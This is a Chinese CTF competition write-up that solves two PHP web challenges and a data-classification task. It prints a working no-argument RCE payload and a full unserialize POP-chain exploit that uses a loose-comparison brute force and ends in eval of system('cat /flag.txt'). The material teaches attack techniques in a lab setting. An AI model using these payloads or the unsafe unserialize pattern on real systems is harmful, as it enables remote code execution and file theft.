省赛决赛wp



省赛决赛

上次就已经很史了,决赛这次更史,出的很没水平,点名批评web1,谜语人就算了,静态靶机限制频率你封我1小时666比赛总共就六小时,一开始爆个密码被封了一小时,做了其他两道web回来随便搞了两下又封了一小时,做你*

web

wucanRCE

见名知义,无参RCE,直接用get_defined_vars:

?c=eval(end(pos(get_defined_vars())));&a=system("cat ../f*");

unserialize

简陋的php反序列化,走的流程是:

AAA # __destruct
AAA # __toString
GGG # __invoke
EEE # __get

invoke这里是一个弱类型比较:

// Guard quoted from the challenge. The double-MD5 hex string is compared with
// the integer 666 using loose `==`, so PHP type-juggles instead of comparing
// digests: before PHP 8 a string is converted to a number by its leading
// digits. A strict `===` against a string, or hash_equals(), does not coerce.
public function __invoke(){
    if(md5(md5($this -> book)) == 666) {   
        // If $green has no accessible `pen` property, this read invokes
        // $green's __get magic method.
        return $this -> green -> pen;
    }
}

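直接写脚本爆破出一个字符串,使其两次md5的结果以666开头、且第四位是除e以外的字母即可。原因:PHP 8之前,`==`会把以数字开头的字符串按前导数字转成数值再比较,所以"666a…" == 666成立;第四位若是数字,前导数值就不再是666,若是e则可能被当作科学计数法解析。PHP 8起,整数与这类非纯数字字符串比较时改为按字符串比较,这个弱比较不再成立;校验哈希应使用`===`或hash_equals()。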

import hashlib
from itertools import product
def md5(a):
    """Return the lowercase hex MD5 digest of the UTF-8 encoding of ``a``.

    MD5 is used here only to reproduce the check quoted from the challenge;
    it is not a suitable hash for passwords or integrity protection.
    """
    return hashlib.md5(a.encode()).hexdigest()
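# Sanity check of the helper: prints the MD5 of "123".
print(md5("123"))

# Candidate alphabet, kept in the original order so candidates are tried in
# the same sequence as the nested loops this replaces.
dic = "1234567890poiuytrewqasdfghjklmnbvcxz"

# Search 5-character strings for one whose double MD5 starts with "666"
# followed by a letter other than "e". That is the shape the challenge's
# loose `== 666` comparison accepts: a digit in position 4 would change the
# leading number, and "e" could be read as an exponent.
#
# Changes from the original loop:
#   * the digest is no longer bound to the name `hash` (shadowed the builtin);
#   * the per-candidate "TEST" print is gone, since console I/O dominated the
#     run time;
#   * the search stops with `break` instead of exit(114514), so a successful
#     run ends with exit status 0.
for chars in product(dic, repeat=5):
    candidate = "".join(chars)
    digest = md5(md5(candidate))
    # hexdigest() only yields 0-9 and a-f, so "a letter that is not e" is
    # exactly one of a, b, c, d, f.
    if digest.startswith("666") and digest[3] in "abcdf":
        print(f"success!原值:{candidate} 哈希:{digest}")
        break
else:
    print("no candidate found")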

得到值11h7g
最后一个绕:

// Final gadget as quoted in the write-up. eval() executes the string held in
// $f; when an instance is created by unserialize(), all three properties come
// from the serialized input.
class EEE{
    public $d=array();
    public $e;
    public $f='system("cat /flag.txt");';
    // Invoked when an inaccessible or undeclared property is read.
    public function __get($arg1){
        $this->d[$this->e]=1;
        // Assignment, not comparison: the condition is the value of the
        // append expression, which is 1 whenever the append succeeds.
        if ($this->d[]=1){
            echo 'nononononnnn!!!';
            }
        else{
            // Reached only when the append above does not yield a truthy value.
            eval($this->f);
            }
    }
}

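这里出题人自作聪明,随便给d改个123就绕了:d是标量时,`$this->d[$this->e]=1`和`$this->d[]=1`都无法把标量当数组写入,赋值表达式得不到真值,于是走进else里的eval。这依赖PHP 7的行为(只产生警告);PHP 8对这种写入会直接抛出Error。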
exp:

<?php
// Writes this file's own source, syntax-highlighted, to the output.
highlight_file(__FILE__);
// Turns off all error reporting, so warnings and notices are not shown.
error_reporting(0);
// First two links of the chain listed in the write-up: __destruct echoes
// $aear, and when $aear is itself an AAA that string conversion calls
// __toString, which calls $string as a function.
class AAA{
    public $aear;
    public $string;
    public function __construct($a){
        $this -> aear = $a;
    }
    // Runs when the object is destroyed; this also applies to objects
    // created by unserialize().
    function __destruct()
    {
        echo "11111";
        // echo forces a string conversion; an object here has its
        // __toString called.
        echo $this -> aear;
    }
    public function __toString()
    {
        $new = $this -> string;
        // Calling an object like a function invokes its __invoke method.
        return $new();
    }

}

// Not referenced by the object graph built at the end of this file.
class BBB {
    private $pop;

    public function __construct($string) {
        $this -> pop = $string;
    }

    // Reads the property named by $value, then calls the element stored
    // under that same key as a function.
    public function __get($value) {
        $var = $this -> $value;
        $var[$value]();
    }
}

// Not referenced by the object graph built at the end of this file.
class DDD{
    public $bag;
    public $magazine;

    // Calls add() on $bag with errors suppressed by @ and returns the result.
    public function __toString()
    {
        $length = @$this -> bag -> add();
        return $length;
    }
    // Invoked on writes to inaccessible properties; reads $magazine->tower
    // and echoes a message when it is truthy.
    public function __set($arg1,$arg2)
    {
        if($this -> magazine -> tower)
        {
            echo "really??";
        }
    }
}

// Last link of the chain. Differs from the challenge snippet quoted earlier
// only in $d, which is the scalar 123 here instead of array().
class EEE{
    public $d=123;
    public $e;
    public $f='system("cat /flag.txt");';
    // Invoked when an inaccessible or undeclared property is read.
    public function __get($arg1){
        // With a scalar $d neither array write can succeed (PHP 7 reports a
        // warning, PHP 8 throws an Error) - NOTE(review): confirm against the
        // PHP version the target runs.
        $this->d[$this->e]=1;
        // Assignment used as the condition, not a comparison.
        if ($this->d[]=1){
            echo 'nononononnnn!!!';
            }
        else{
            // eval() of a property value: code execution sink.
            eval($this->f);
            }
    }
}

// Not referenced by the object graph built at the end of this file.
class FFF{
    protected $cookie;

    protected function delete() {
        return $this -> cookie;
    }

    // Invoked for calls to inaccessible or undefined methods: echoes a marker,
    // then calls the method named $func . "haha" on this object, passing the
    // original argument array as a single argument.
    public function __call($func, $args) {
        echo 'hahahhhh';
        call_user_func([$this, $func."haha"], $args);
    }
}
// Third link of the chain: called as a function from AAA::__toString.
class GGG{
    public $green;
    public $book;
    public function __invoke(){
        // Loose `==` between the double-MD5 hex string and the integer 666:
        // PHP type-juggles instead of comparing digests. `===` against a
        // string, or hash_equals(), would not coerce.
        if(md5(md5($this -> book)) == 666) {   
            // `pen` is not declared on EEE, so this read invokes EEE::__get
            // when $green is an EEE.
            return $this -> green -> pen;
        }
    }
}

// Root cause carried over from the challenge source: request data is passed
// straight to unserialize(), so the sender chooses which of the classes above
// get instantiated and what their properties hold. Safer designs parse a data
// format such as JSON, or pass ['allowed_classes' => false] as the second
// argument to unserialize().
if(isset($_POST['UP'])) {
    unserialize($_POST['UP']);
}

// Builds the object graph that follows the chain listed in the write-up and
// prints its serialized form.
// Inner AAA: its $aear (1) is only echoed; $string is what matters.
$a2 = new AAA(1);
$g = new GGG();
// Value the write-up reports from its brute-force script for the `== 666` check.
$g -> book = "11h7g";
// EEE as defined above, with $d set to the scalar 123.
$e = new EEE();

// GGG::__invoke reads $green->pen, which reaches EEE::__get.
$g -> green = $e;
// AAA::__toString calls $string(), which reaches GGG::__invoke.
$a2 -> string = $g;
// Outer AAA: __destruct echoes $aear ($a2), which reaches AAA::__toString.
$a1 = new AAA($a2);
echo serialize($a1);

数据安全

datasecurity_classify1

直接按长度推断数据类型即可

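# Label every line of 1.txt by its length alone and write "label,value" rows
# to 2.txt: up to 6 characters is a name, fewer than 18 a phone number,
# anything longer an ID number.
#
# Changes from the original:
#   * both files are opened with `with`, so they are closed even on error;
#   * the two debug prints of the whole record list are gone, because the
#     values are personal data and do not belong on the console or in logs;
#   * the output file is opened "w" instead of "w+", as it is never read back.
#
# NOTE(review): length is a weak discriminator. An empty line is labelled as a
# name, and any 7-17 character value as a phone number. Checking the format
# (digits only, exact length) would be more robust.
with open("1.txt", encoding="utf-8") as src:
    # Strip only the trailing newline; every other character counts towards
    # the length used for classification.
    lines = [line.rstrip("\n") for line in src]

with open("2.txt", "w", encoding="utf-8") as out:
    for line in lines:
        if len(line) <= 6:
            label = "姓名"
        elif len(line) < 18:
            label = "手机号"
        else:
            label = "身份证号"
        out.write(f"{label},{line}\n")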

第二题到最后还是要写正则,三个人都不会,不出网直接g了,最后正确率也只有68%
后来发现是忘记去重,而且匹配电话号码时用的是"11位数字",把18位身份证号里的片段也匹配进去了(给11位数字的匹配加上前后都不是数字的限定,就不会误匹配身份证号)
丑完了。。。

A web ctfer from 0RAYS
最后更新于 2024-11-11